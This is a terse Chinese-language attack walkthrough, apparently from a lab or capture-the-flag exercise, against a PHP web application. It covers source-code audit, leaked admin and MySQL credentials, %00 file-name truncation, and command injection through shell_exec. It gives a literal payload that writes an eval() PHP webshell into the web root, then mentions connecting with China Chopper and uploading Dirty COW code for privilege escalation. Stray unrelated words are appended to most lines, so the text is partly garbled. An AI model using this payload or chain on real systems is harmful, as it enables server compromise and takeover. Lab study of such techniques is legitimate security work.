更具實驗文件知道存在源碼泄露 下載源碼進行源碼審計php
發現admin帳號html
查看user.php 發現mysql 帳號 端口mysql
對登陸後源碼進行審計 發現上傳文件的兩處漏洞sql
對 fiel name 能夠 %00 截斷 上傳一句話木馬 對file name shell_exec 未對參數過濾 能夠拼接執行 命令 寫一句話 例如 shell
'|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||'htm
菜刀鏈接blog
上傳髒牛提權源碼